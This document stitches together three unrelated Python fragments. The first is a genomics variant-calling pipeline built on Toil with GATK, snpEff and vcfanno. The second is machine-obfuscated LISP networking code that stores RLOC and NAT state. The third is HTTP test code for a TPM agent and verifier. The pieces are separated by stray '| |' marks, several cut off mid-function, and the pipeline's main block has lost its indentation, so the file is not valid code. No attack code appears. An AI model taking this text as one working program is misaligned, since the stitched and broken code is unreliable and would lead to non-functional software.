    :param vcf_files: List of input vcf files for merging.
    :type vcf_files: list.
    :returns: str -- The output (sorted, uncompressed) vcf file name.
    """
    merged_vcf = "{}.merged.vcf.gz".format(sample)
    uncompressed_vcf = "{}.merged.vcf".format(sample)
    sorted_vcf = "{}.merged.sorted.vcf".format(sample)

    logfile1 = "{}.merging.log".format(sample)
    logfile2 = "{}.uncompress-merging.log".format(sample)
    logfile3 = "{}.merged_sort.log".format(sample)

    vcf_files_string = " ".join(vcf_files)

    # bcbio-variation-recall ensemble merge (numpass 1 = keep a variant if
    # any single caller reports it).
    command = [str(config['ensemble']['bin']),
               "ensemble",
               "-c", str(config['ensemble']['num_cores']),
               "--numpass", "1",
               "--names", str(callers),
               merged_vcf,
               str(config['reference']),
               vcf_files_string]

    command2 = ["bgzip", "-cd", merged_vcf, ">", uncompressed_vcf]

    command3 = [str(config['picard']['bin']),
                "SortVcf",
                "SEQUENCE_DICTIONARY={}".format(config['dict']),
                "OUTPUT={}".format(sorted_vcf),
                "INPUT={}".format(uncompressed_vcf)]

    sys.stderr.write("Running commands: \n")
    sys.stderr.write("bcbio-variation-recall Command: {}\n".format(command))
    sys.stderr.write("Uncompression Command: {}\n".format(command2))
    sys.stderr.write("Sort Command: {}\n".format(command3))

    job.fileStore.logToMaster("bcbio-variation-recall Command: {}\n".format(command))
    run_and_log_command(" ".join(command), logfile1)

    job.fileStore.logToMaster("Uncompression Command: {}\n".format(command2))
    run_and_log_command(" ".join(command2), logfile2)

    job.fileStore.logToMaster("Sort Command: {}\n".format(command3))
    run_and_log_command(" ".join(command3), logfile3)

    # The index file created by Picard often causes problems with the GATK.
    # BUG FIX: removal was unconditional, which raised OSError/FileNotFoundError
    # and killed the job whenever Picard did not write an index.
    index_file = "{}.idx".format(sorted_vcf)
    if os.path.exists(index_file):
        os.remove(index_file)

    return sorted_vcf
def annotate_vcf(job, config, name, input_vcf, input_bam):
    """Run GATK VariantAnnotator over the specified VCF.

    :param config: The configuration dictionary.
    :type config: dict.
    :param name: sample name.
    :type name: str.
    :param input_vcf: The input_vcf file name to process.
    :type input_vcf: str.
    :param input_bam: The input_bam file name to process.
    :type input_bam: str.
    :returns: str -- The output vcf file name.
    """
    output_vcf = "{}.annotated.vcf".format(name)
    annotation_logfile = "{}.variantannotation.log".format(name)

    # -L restricts annotation to the intervals covered by the input VCF.
    annotation_command = [str(config['gatk-annotate']['bin']),
                          "-T", "VariantAnnotator",
                          "-R", str(config['reference']),
                          "-nt", str(config['gatk-annotate']['num_cores']),
                          "--group", "StandardAnnotation",
                          "--dbsnp", str(config['dbsnp']),
                          "-I", str(input_bam),
                          "--variant", str(input_vcf),
                          "-L", str(input_vcf),
                          "-o", output_vcf]

    job.fileStore.logToMaster("GATK VariantAnnotator Command: {}\n".format(annotation_command))
    run_and_log_command(" ".join(annotation_command), annotation_logfile)

    return output_vcf
def filter_variants(job, config, name, input_vcf):
    """Run GATK VariantFiltration over the specified VCF.

    Applies four hard filters (MQ0, depth, site quality, mapping quality)
    whose thresholds come from the configuration.

    :param config: The configuration dictionary.
    :type config: dict.
    :param name: sample name.
    :type name: str.
    :param input_vcf: The input_vcf file name to process.
    :type input_vcf: str.
    :returns: str -- The output vcf file name.
    """
    output_vcf = "{}.filtered.vcf".format(name)
    filter_log = "{}.variantfiltration.log".format(name)

    filter_command = [str(config['gatk-filter']['bin']),
                      "-T", "VariantFiltration",
                      "-R", str(config['reference']),
                      "--filterExpression", "'MQ0 > {}'".format(config['mq0_threshold']),
                      "--filterName", "'HighMQ0'",
                      "--filterExpression", "'DP < {}'".format(config['coverage_threshold']),
                      "--filterName", "'LowDepth'",
                      "--filterExpression", "'QUAL < {}'".format(config['var_qual_threshold']),
                      "--filterName", "'LowQual'",
                      "--filterExpression", "'MQ < {}'".format(config['map_qual_threshold']),
                      "--filterName", "'LowMappingQual'",
                      "--variant", str(input_vcf),
                      "-o", output_vcf]

    job.fileStore.logToMaster("GATK VariantFiltration Command: {}\n".format(filter_command))
    run_and_log_command(" ".join(filter_command), filter_log)

    return output_vcf
def snpeff(job, config, name, input_vcf):
    """Annotate the specified VCF using snpEff.

    :param config: The configuration dictionary.
    :type config: dict.
    :param name: sample name.
    :type name: str.
    :param input_vcf: The input_vcf file name to process.
    :type input_vcf: str.
    :returns: str -- The output vcf file name.
    """
    output_vcf = "{}.snpEff.{}.vcf".format(name, config['snpeff']['reference'])
    logfile = "{}.snpeff.log".format(name)

    snpeff_command = [str(config['snpeff']['bin']),
                      "-Xmx{}g".format(config['snpeff']['max_mem']),
                      "-onlyTr {}".format(config['transcripts']),
                      "-v",
                      str(config['snpeff']['reference']),
                      str(input_vcf),
                      # BUG FIX: a missing comma after ">" previously fused
                      # the redirect with the output filename via implicit
                      # string concatenation (">out.vcf").
                      ">",
                      output_vcf]

    job.fileStore.logToMaster("snpEff Command: {}\n".format(snpeff_command))
    run_and_log_command(" ".join(snpeff_command), logfile)

    return output_vcf
def vcfanno(job, config, name, samples, input_vcf):
    """Add additional annotations to the specified VCF with vcfanno.

    :param config: The configuration dictionary.
    :type config: dict.
    :param name: sample name.
    :type name: str.
    :param samples: per-sample configuration dict (provides vcfanno_config).
    :param input_vcf: The input_vcf file name to process.
    :type input_vcf: str.
    :returns: str -- The output vcf file name.
    """
    output_vcf = "{}.vcfanno.snpEff.{}.vcf".format(name, config['snpeff']['reference'])
    logfile = "{}.vcfanno.log".format(name)

    command = [str(config['vcfanno']['bin']),
               "-p", str(config['vcfanno']['num_cores']),
               "--lua", str(config['vcfanno']['lua']),
               str(samples[name]['vcfanno_config']),
               str(input_vcf),
               ">", output_vcf]

    job.fileStore.logToMaster("VCFAnno Command: {}\n".format(command))
    run_and_log_command(" ".join(command), logfile)

    return output_vcf
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--samples_file', help="Input configuration file for samples")
parser.add_argument('-c', '--configuration', help="Configuration file for various settings")
parser.add_argument('-a', '--address', help="IP Address for Cassandra connection", default='127.0.0.1')
parser.add_argument('-u', '--username', help='Cassandra username for login', default=None)
Job.Runner.addToilOptions(parser)
args = parser.parse_args()
args.logLevel = "INFO"
cwd = os.getcwd()
sys.stdout.write("Setting up analysis directory\n")
# if not os.path.exists("Logs"):
# os.makedirs("Logs")
# if not os.path.exists("FinalVCFs"):
# os.makedirs("FinalVCFs")
# if not os.path.exists("FinalBAMs"):
# os.makedirs("FinalBAMs")
# if not os.path.exists("Intermediates"):
# os.makedirs("Intermediates")
# if not os.path.exists("Coverage"):
# os.makedirs("Coverage")
# if not os.path.exists("Reports"):
# os.makedirs("Reports")
sys.stdout.write("Parsing configuration data\n")
config = configuration.configure_runtime(args.configuration)
sys.stdout.write("Parsing sample data\n")
samples = configuration.configure_samples(args.samples_file, config)
if args.username:
password = <PASSWORD>()
auth_provider = PlainTextAuthProvider(username=args.username, password=password)
else:
auth_provider = None
# Workflow Graph definition. The following workflow definition should create a valid Directed Acyclic Graph (DAG)
root_job = Job.wrapJobFn(spawn_batch_jobs, cores=1)
fastqc_job = Job.wrapJobFn(run_fastqc, config, samples)
# Per sample jobs
for sample in samples:
# Alignment and Refinement Stages
align_job = Job.wrapJobFn(run_bwa_mem, config, sample, samples,
cores=int(config['bwa']['num_cores']),
memory="{}G".format(config['bwa']['max_mem']))
add_job = Job.wrapJobFn(add_or_replace_readgroups, config, sample, align_job.rv(),
cores=1,
memory="{}G".format(config['picard-add']['max_mem']))
creator_job = Job.wrapJobFn(realign_target_creator, config, sample, add_job.rv(),
cores=int(config['gatk-realign']['num_cores']),
memory="{}G".format(config['gatk-realign']['max_mem']))
realign_job = Job.wrapJobFn(realign_indels, config, sample, add_job.rv(), creator_job.rv(),
cores=1,
memory="{}G".format(config['gatk-realign']['max_mem']))
recal_job = Job.wrapJobFn(recalibrator, config, sample, realign_job.rv(),
cores=int(config['gatk-recal']['num_cores']),
memory="{}G".format(config['gatk-recal']['max_mem']))
coverage_job = Job.wrapJobFn(sambamba_region_coverage, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['gatk']['num_cores']),
memory="{}G".format(config['gatk']['max_mem']))
# Variant Calling
spawn_variant_job = Job.wrapJobFn(spawn_batch_jobs)
freebayes_job = Job.wrapJobFn(freebayes_single, config, sample,
"{}.recalibrated.sorted.bam".format(sample),
cores=1,
memory="{}G".format(config['freebayes']['max_mem']))
mutect_job = Job.wrapJobFn(mutect_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=1,
memory="{}G".format(config['mutect']['max_mem']))
vardict_job = Job.wrapJobFn(vardict_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['vardict']['num_cores']),
memory="{}G".format(config['vardict']['max_mem']))
scalpel_job = Job.wrapJobFn(scalpel_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['scalpel']['num_cores']),
memory="{}G".format(config['scalpel']['max_mem']))
platypus_job = Job.wrapJobFn(platypus_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['platypus']['num_cores']),
memory="{}G".format(config['platypus']['max_mem']))
pindel_job = Job.wrapJobFn(run_pindel, config, sample,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['pindel']['num_cores']),
memory="{}G".format(config['pindel']['max_mem']))
# Need to filter for on target only results somewhere as well
spawn_normalization_job = Job.wrapJobFn(spawn_batch_jobs)
normalization_job1 = Job.wrapJobFn(vt_normalization, config, sample, "freebayes",
"{}.freebayes.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job2 = Job.wrapJobFn(vt_normalization, config, sample, "mutect",
"{}.mutect.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job3 = Job.wrapJobFn(vt_normalization, config, sample, "vardict",
"{}.vardict.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job4 = Job.wrapJobFn(vt_normalization, config, sample, "scalpel",
"{}.scalpel.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job5 = Job.wrapJobFn(vt_normalization, config, sample, "platypus",
"{}.platypus.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job6 = Job.wrapJobFn(vt_normalization, config, sample, "pindel",
"{}.pindel.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
callers = "freebayes,mutect,vardict,scalpel,platypus,pindel"
merge_job = Job.wrapJobFn(merge_variant_calls, config, sample, callers, (normalization_job1.rv(),
normalization_job2.rv(),
normalization_job3.rv(),
normalization_job4.rv(),
normalization_job5.rv(),
normalization_job6.rv()))
gatk_annotate_job = Job.wrapJobFn(annotate_vcf, config, sample, merge_job.rv(),
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['gatk-annotate']['num_cores']),
memory="{}G".format(config['gatk-annotate']['max_mem']))
gatk_filter_job = Job.wrapJobFn(filter_variants, config, sample, gatk_annotate_job.rv(),
cores=1,
memory="{}G".format(config['gatk-filter']['max_mem']))
snpeff_job = Job.wrapJobFn(snpeff, config, sample, "{}.filtered.vcf".format(sample),
cores=int(config['snpeff']['num_cores']),
memory="{}G".format(config['snpeff']['max_mem']))
vcfanno_job = Job.wrapJobFn(vcfanno, config, sample, samples,
"{}.snpEff.{}.vcf".format(sample, config['snpeff']['reference']),
cores=int(config['vcfanno']['num_cores']),
memory="{}G".format(config['vcfanno']['max_mem']))
# Create workflow from created jobs
root_job.addChild(align_job)
# align_job.addChild(add_job)
# add_job.addChild(creator_job)
# creator_job.addChild(realign_job)
# realign_job.addChild(recal_job)
#
# recal_job.addChild(spawn_variant_job)
#
# spawn_variant_job.addChild(coverage_job)
# spawn_variant_job.addChild(freebayes_job)
# spawn_variant_job.addChild(mutect_job)
# spawn_variant_job.addChild(vardict_job)
# spawn_variant_job.addChild(scalpel_job)
# spawn_variant_job.addChild(platypus_job)
# spawn_variant_job.addChild(pindel_job)
#
# spawn_variant_job.addFollowOn(spawn_normalization_job)
#
# spawn_normalization_job.addChild(normalization_job1)
# spawn_normalization_job.addChild(normalization_job2)
# spawn_normalization_job.addChild(normalization_job3)
# spawn_normalization_job.addChild(normalization_job4)
# spawn_normalization_job.addChild(normalization_job5)
# spawn_normalization_job.addChild(normalization_job6)
#
# spawn_normalization_job.addFollowOn(merge_job)
#
# merge_job.addChild(gatk_annotate_job)
# gatk_annotate_job.addChild(gatk_filter_job)
# gatk_filter_job.addChild(snpeff_job)
# | |
self . mweight ) )
if 98 - 98: II111iiii - i1IIi - ooOoO0o
if 36 - 36: IiII + o0oOOo0O0Ooo
def print_rloc_name ( self , cour = False ) :
    """Return a printable "rloc-name: <name>" string, or "" when no
    rloc-name is set. When cour is True the name is wrapped in
    courier-font markup before being colored blue."""
    if self . rloc_name is None :
        return ( "" )
    name = self . rloc_name
    if cour :
        name = lisp_print_cour ( name )
    return ( 'rloc-name: {}' . format ( blue ( name , cour ) ) )
if 81 - 81: OOooOOo / I11i % oO0o + ooOoO0o
if 10 - 10: oO0o / i11iIiiIii
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
    """Populate this RLOC entry from a Map-Reply RLOC-record.

    Copies the RLOC address/name, resolves NAT-translated address and
    encapsulation port (when NAT state exists), carries over geo/elp/json/
    rle locator data and priority/weight fields, and stores encap keys.
    Returns the encapsulation port to use (LISP_DATA_PORT unless NAT state
    overrides it).

    NOTE(review): this source is machine-obfuscated; identifiers are kept
    as-is and the no-op `if N - N:` filler lines are preserved verbatim.
    """
    OOo0000o0 = LISP_DATA_PORT
    self . rloc . copy_address ( rloc_record . rloc )
    self . rloc_name = rloc_record . rloc_name
    if 73 - 73: OoO0O00 - i1IIi
    if 52 - 52: I1ii11iIi11i
    if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
    if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
    #
    # Check whether this RLOC sits behind a NAT; if so, prefer the
    # translated address/port recorded in lisp_nat_state_info.
    #
    i1IIIIi1Ii111 = self . rloc
    if ( i1IIIIi1Ii111 . is_null ( ) == False ) :
        IiiiI11I1 = lisp_get_nat_info ( i1IIIIi1Ii111 , self . rloc_name )
        if ( IiiiI11I1 ) :
            OOo0000o0 = IiiiI11I1 . port
            # Youngest NAT state entry for this rloc-name.
            i11IIi = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
            OoOOoooO000 = i1IIIIi1Ii111 . print_address_no_iid ( )
            I111I = red ( OoOOoooO000 , False )
            IiiiI1i = "" if self . rloc_name == None else blue ( self . rloc_name , False )
            if 62 - 62: OoooooooOO + OoO0O00 . IiII
            if 41 - 41: OoooooooOO + oO0o % oO0o / I1ii11iIi11i
            if 86 - 86: i1IIi
            if 73 - 73: iIii1I11I1II1 * Oo0Ooo
            if 54 - 54: oO0o . Ii1I
            if 31 - 31: I11i
            #
            # Matched NAT state timed out: fall back to the youngest entry,
            # and discard that too when it has also timed out.
            #
            if ( IiiiI11I1 . timed_out ( ) ) :
                lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( I111I , OOo0000o0 , IiiiI1i ) )
                if 60 - 60: Oo0Ooo - iII111i . II111iiii % ooOoO0o / OoooooooOO / iIii1I11I1II1
                if 23 - 23: I11i + iIii1I11I1II1
                IiiiI11I1 = None if ( IiiiI11I1 == i11IIi ) else i11IIi
                if ( IiiiI11I1 and IiiiI11I1 . timed_out ( ) ) :
                    OOo0000o0 = IiiiI11I1 . port
                    I111I = red ( IiiiI11I1 . address , False )
                    lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( I111I , OOo0000o0 ,
                        IiiiI1i ) )
                    IiiiI11I1 = None
            if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
            if 4 - 4: I1Ii111
            if 85 - 85: iIii1I11I1II1 % Oo0Ooo
            if 20 - 20: IiII + i11iIiiIii * OOooOOo
            if 27 - 27: O0 * OoO0O00 * I1ii11iIi11i
            if 40 - 40: O0 + oO0o - ooOoO0o + I1IiiI - IiII
            if 60 - 60: I1Ii111 * OoO0O00 * oO0o + oO0o
            #
            # Valid (non-expired) NAT state: adopt its translated address
            # and encapsulation port for this RLOC.
            #
            if ( IiiiI11I1 ) :
                if ( IiiiI11I1 . address != OoOOoooO000 ) :
                    lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( I111I , red ( IiiiI11I1 . address , False ) ) )
                    if 34 - 34: o0oOOo0O0Ooo
                    self . rloc . store_address ( IiiiI11I1 . address )
                if 76 - 76: oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
                I111I = red ( IiiiI11I1 . address , False )
                OOo0000o0 = IiiiI11I1 . port
                lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( I111I , OOo0000o0 , IiiiI1i ) )
                if 51 - 51: II111iiii / OoOoOO00
                self . store_translated_rloc ( i1IIIIi1Ii111 , OOo0000o0 )
    if 69 - 69: i11iIiiIii
    if 77 - 77: I1ii11iIi11i % OoooooooOO - Oo0Ooo - Ii1I + I11i
    if 93 - 93: I1IiiI % O0 * OoO0O00 % OoOoOO00 . I1Ii111 * I1IiiI
    if 95 - 95: IiII + o0oOOo0O0Ooo - o0oOOo0O0Ooo
    #
    # Carry over the auxiliary locator forms verbatim.
    #
    self . geo = rloc_record . geo
    self . elp = rloc_record . elp
    self . json = rloc_record . json
    if 83 - 83: ooOoO0o
    if 59 - 59: I1ii11iIi11i
    if 26 - 26: I11i . Ii1I
    if 94 - 94: ooOoO0o . I1IiiI + IiII % I1IiiI / o0oOOo0O0Ooo % o0oOOo0O0Ooo
    #
    # For an RLE, store the NAT-translated encap-port on each RLE node
    # that has NAT state.
    #
    self . rle = rloc_record . rle
    if ( self . rle ) :
        for i1ooOoO in self . rle . rle_nodes :
            O0O00O = i1ooOoO . rloc_name
            IiiiI11I1 = lisp_get_nat_info ( i1ooOoO . address , O0O00O )
            if ( IiiiI11I1 == None ) : continue
            if 21 - 21: O0 / OOooOOo - II111iiii + I1ii11iIi11i / OoooooooOO
            OOo0000o0 = IiiiI11I1 . port
            Ooo000oo0OO0 = O0O00O
            if ( Ooo000oo0OO0 ) : Ooo000oo0OO0 = blue ( O0O00O , False )
            if 81 - 81: i11iIiiIii / Oo0Ooo * i1IIi + OoO0O00 + O0 % I1ii11iIi11i
            lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( OOo0000o0 ,
                i1ooOoO . address . print_address_no_iid ( ) , Ooo000oo0OO0 ) )
            i1ooOoO . translated_port = OOo0000o0
    if 94 - 94: i11iIiiIii
    if 90 - 90: iII111i + i11iIiiIii + iII111i % I1IiiI % oO0o
    if 71 - 71: ooOoO0o + OOooOOo * I1IiiI % I11i . I1Ii111 % OoooooooOO
    self . priority = rloc_record . priority
    self . mpriority = rloc_record . mpriority
    self . weight = rloc_record . weight
    self . mweight = rloc_record . mweight
    # Mark the RLOC up only for a local, reachable, non-probe record.
    if ( rloc_record . reach_bit and rloc_record . local_bit and
        rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
    if 7 - 7: iIii1I11I1II1
    if 88 - 88: ooOoO0o
    if 37 - 37: ooOoO0o * OoOoOO00 . ooOoO0o
    if 47 - 47: iIii1I11I1II1 + iIii1I11I1II1 / Ii1I
    #
    # Store encap keys only when the reply source is the RLOC itself.
    #
    I11II1iiIIIIiI = source . is_exact_match ( rloc_record . rloc ) if source != None else None
    if 76 - 76: iIii1I11I1II1 . iIii1I11I1II1 / OOooOOo / OoOoOO00 / iII111i / II111iiii
    if ( rloc_record . keys != None and I11II1iiIIIIiI ) :
        i1IIiI1iII = rloc_record . keys [ 1 ]
        if ( i1IIiI1iII != None ) :
            OoOOoooO000 = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( OOo0000o0 )
            if 64 - 64: i1IIi * II111iiii + I1ii11iIi11i + OOooOOo % I1ii11iIi11i - OoooooooOO
            i1IIiI1iII . add_key_by_rloc ( OoOOoooO000 , True )
            lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( OoOOoooO000 , False ) ) )
    if 96 - 96: IiII + oO0o / Oo0Ooo + OoooooooOO
    if 53 - 53: Ii1I * IiII + Oo0Ooo + i11iIiiIii - iIii1I11I1II1
    if 66 - 66: O0 - I1ii11iIi11i * iIii1I11I1II1 - I1Ii111 / I1ii11iIi11i
    return ( OOo0000o0 )
if 24 - 24: Ii1I
if 39 - 39: O0 % Ii1I
def store_translated_rloc ( self , rloc , port ) :
    """Record a NAT-translated locator: overwrite the active RLOC address,
    remember it as the translated address, and store the translated
    encapsulation port."""
    self . rloc . copy_address ( rloc )
    self . translated_rloc . copy_address ( rloc )
    self . translated_port = port
if 63 - 63: OOooOOo / I1ii11iIi11i
if 11 - 11: O0 % iIii1I11I1II1
def is_rloc_translated ( self ) :
    """Return True when a NAT-translated RLOC address has been stored."""
    return ( self . translated_rloc . is_null ( ) == False )
if 64 - 64: OoOoOO00 - oO0o
if 8 - 8: i11iIiiIii - iIii1I11I1II1 / I1Ii111 . i11iIiiIii % o0oOOo0O0Ooo / oO0o
def rloc_exists ( self ) :
    """Return True when this entry carries a usable RLOC address.

    A null address still counts as existing unless one of the name-based
    locator forms (rle/geo/elp/json) is set instead."""
    if not self . rloc . is_null ( ) :
        return ( True )
    has_named_locator = ( self . rle_name or self . geo_name or
        self . elp_name or self . json_name )
    return ( not has_named_locator )
if 53 - 53: OoooooooOO / I1IiiI % I11i + Oo0Ooo
if 15 - 15: O0
def is_rtr ( self ) :
return ( ( self . priority == | |
except Exception as e:
self.fail("Problem reading backup persistence file after POST. Error: %s"%e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Verify the recorded HTTP body lists exactly one active agent and that
    it is the expected UUID (passed in via ``argument``)."""
    uuid_str = argument
    test_record = self.test_table.get(test_method_name)
    for entry in test_record[state_change_or_validation]:
        if entry.get("function_name") != test_function_name:
            continue
        decoded = json.loads(entry.get("http_result_body_actual"))
        if len(decoded) != 1 or decoded.get(uuid_str) is None:
            self.fail("Expected " + uuid_str + " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Validate the recorded TPM quote and, on success, deliver the encrypted
    U secret back to the Cloud Agent.

    Looks up the recorded HTTP response for ``test_function_name``, checks it
    contains a pubkey and quote, validates the quote via a Tenant instance,
    then RSA-encrypts the global U with the agent's public key and POSTs it
    (with an HMAC check value derived from the global K) to the agent.
    """
    test_record = self.test_table.get(test_method_name)
    #perform each of the test functions and store the results
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            response_body = test_functions.get("http_result_body_actual")
            jsondecoded = json.loads(response_body)
            public_key = jsondecoded.get("pubkey")
            quote = jsondecoded.get("quote")
            # test to make sure these two keys (and values) are in the return
            if public_key == None or quote == None:
                self.fail("Expected both pubkey and quote arguments." )
            else:
                # Build a throwaway tenant purely to validate the quote.
                mytenant = tenant.Tenant()
                # command line options can overwrite config values
                mytenant.cloudagent_ip = cloudagent_ip
                mytenant.cloudverifier_ip = cloudverifier_ip
                mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
                if mytenant.validate_tpm_quote(public_key, quote):
                    # encrypt U with the public key
                    global U, K
                    encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key),str(U))
                    # HMAC over the agent UUID lets the agent verify K later.
                    encrypt_check = crypto.do_hmac(K,mytenant.agent_uuid)
                    # NOTE(review): b64encode returns bytes on Python 3;
                    # json.dumps below assumes str — presumably Python 2 era.
                    b64_encrypted_u = base64.b64encode(encrypted_U)
                    data = {
                        'encrypted_key': b64_encrypted_u,
                        'encrypt_check': encrypt_check
                    }
                    u_json_message = json.dumps(data)
                    #post encrypted U back to Cloud Agent
                    response = tornado_requests.request("POST", "http://%s:%s/v1/quotes/tenant"%(cloudagent_ip,cloudagent_port),data=u_json_message)
                    if response.status_code != 200:
                        self.fail("Posting of Encrypted U to the Cloud Agent failed with response code %d" %response.status_code )
                else:
                    self.fail("TPM Quote from cloud agent is invalid for nonce: %s"%self.nonce )
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Verify the recorded quote response carries both a public key and a
    TPM quote."""
    test_record = self.test_table.get(test_method_name)
    for entry in test_record[state_change_or_validation]:
        if entry.get("function_name") != test_function_name:
            continue
        payload = json.loads(entry.get("http_result_body_actual"))
        # Both fields must be present (and non-null) in the response body.
        if payload.get("pubkey") is None or payload.get("quote") is None:
            self.fail("Expected both pubkey and quote arguments." )
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Compare the recorded provide-V response for instance
    06480EC4-6BF3-4F00-8323-FE6AE5868297 against the canned expected values,
    failing on the first mismatching field."""
    expected = {
        "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=",
        "ip": "127.0.0.1",
        "port": "8882",
        "tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"},
    }
    test_record = self.test_table.get(test_method_name)
    for entry in test_record[state_change_or_validation]:
        if entry.get("function_name") != test_function_name:
            continue
        decoded = json.loads(entry.get("http_result_body_actual"))
        # Fields are checked in the original order: v, ip, port, tpm_policy.
        for field, want in expected.items():
            got = decoded.get(field)
            if got is None or got != want:
                self.fail("Returned {} from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.".format(field))
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
agent_id_list = json.loads(target_body)
expected_len = argument
actual_len = len(agent_id_list)
if actual_len != expected_len:
self.fail("Expected " + str(expected_len) +" instance id's but received " + str(actual_len))
for agent_id in agent_id_list:
params = {
'agent_id': agent_id,
}
try:
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + agent_id + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + agent_id + " failed with exception: %s"%e)
    def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration ):
        """Run a single table-driven HTTP test step.

        Executes the optional pre_function, issues the HTTP request described
        by the *test_functions* table entry, records the actual
        status/headers/body back into that entry, validates them against the
        expected values, runs the optional deep check_function, and finally
        the optional post_function.
        """
        # call the pre_function
        pre_function = test_functions.get("pre_function")
        if pre_function is not None:
            pre_function_name = pre_function.get('name')
            pre_function_args = pre_function.get('args')
            # Hooks are resolved by name on this test instance via getattr.
            function_return = getattr(self, pre_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args) #self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
            if function_return == False:
                self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted." )
        full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
        # The request body may come inline or from a file, but not both.
        http_request_body_tag = test_functions.get("http_request_body")
        http_request_body_file_tag = test_functions.get("http_request_body_file")
        if http_request_body_tag != None and http_request_body_file_tag != None :
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
        thedata = ''
        if http_request_body_tag == None and http_request_body_file_tag != None:
            thedata = open(http_request_body_file_tag).read()
        else:
            thedata=http_request_body_tag
        verb = test_functions.get("http_request_verb")
        query = test_functions.get("http_request_query","")
        # NOTE(review): the bare .get() on the next line discards its result —
        # it duplicates the assignment that follows and looks like leftover code.
        test_functions.get("http_request_header")
        req_header = test_functions.get("http_request_header")
        response = tornado_requests.request(verb, full_url,
                                          params=query,
                                          data=thedata,
                                          headers=req_header)
        # Spool the streamed response body into a temp file, then read it back.
        temp = tempfile.TemporaryFile()
        for chunk in response.iter_content(1024):
            temp.write(chunk)
        temp.seek(0)
        # copy the results for future checking
        test_functions["http_result_status_actual"] = response.status_code
        test_functions["http_result_header_actual"] = response.headers
        test_functions["http_result_body_actual"] = temp.read()
        #validate response status
        if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"])) # reset the file marker for reading
        #validate response headers: every expected header must appear in the actual ones
        if test_functions.get("http_result_header_expected") is not None and not (all(item in response.headers.items() for item in test_functions["http_result_header_expected"].items())):
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive expected headers.")
